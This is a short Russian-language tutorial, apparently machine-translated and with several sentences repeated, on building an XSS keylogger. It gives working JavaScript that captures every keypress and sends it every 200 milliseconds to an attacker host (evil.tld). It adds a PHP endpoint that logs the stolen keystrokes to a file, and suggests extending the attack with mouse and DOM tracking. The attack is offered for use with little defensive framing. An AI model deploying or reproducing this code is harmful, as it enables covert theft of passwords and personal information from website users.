в едение
Если вы никогда не слышали о XSS Keyloggers, это простой способ захватить информацию о типе пользователя на веб-странице.
Keylogging - это действие записи нажатых клавиш на клавиатуре.
Ключ-кейлогер можно использовать для шпионажа кого-то, захвата их паролей, перехвата их разговоров или кражи их личной информации.
Ключ-кейлогер можно использовать для шпионажа кого-то, захвата их паролей, перехвата их разговоров или кражи их личной информации.
В большинстве случаев злоумышленник украдет cookie SESSION, чтобы олицетворять целевого пользователя.
Но в некоторых ситуациях файл cookie SESSION может быть недостаточным, злоумышленнику может понадобиться знать, что набирает целевой пользователь.
Но в некоторых ситуациях файл cookie SESSION может быть недостаточным, злоумышленнику может понадобиться знать, что набирает целевой пользователь.
- Только cookie HTTP
- Аутентификация без сеанса
- Пароль, необходимый для выполнения действий с более высокими привилегиями
Клиент Javascript Keylogger
Код ниже - крошечный кейлоггер Javascript, он хранит все нажатия клавиш вместе с метками времени в массиве и отправляет их на сервер, контролируемый атакующем через HTTP, каждые 200 миллисекунд.
var buffer = [];
var attacker = 'http://evil.tld/?c='
document.onkeypress = function(e) {
var timestamp = Date.now() | 0;
var stroke = {
k: e.key,
t: timestamp
};
buffer.push(stroke);
}
window.setInterval(function() {
if (buffer.length > 0) {
var data = encodeURIComponent(JSON.stringify(buffer));
new Image().src = attacker + data;
buffer = [];
}
}, 200);
Сервер PHP Keylogger
Чтобы протестировать кейлоггер JavaScript на веб-сервере с PHP,
вы можете использовать приведенный ниже код.
<?php
if(!empty($_GET['c'])) {
$logfile = fopen('data.txt', 'a+');
fwrite($logfile, $_GET['c']);
fclose($logfile);
}
?>
Этот учебник охватывает очень небольшую часть того, что может сделать бэкдор JavaScript.
Хорошим улучшением будет отслеживание положения мыши и элемента DOM и отправка всего злоумышленника в режиме реального времени с использованием WebSockets.
Хорошим улучшением будет отслеживание положения мыши и элемента DOM и отправка всего злоумышленника в режиме реального времени с использованием WebSockets.
Если вы не хотите настраивать это программное обеспечение,
github.com/xsshunter
Комментарии
Отправить комментарий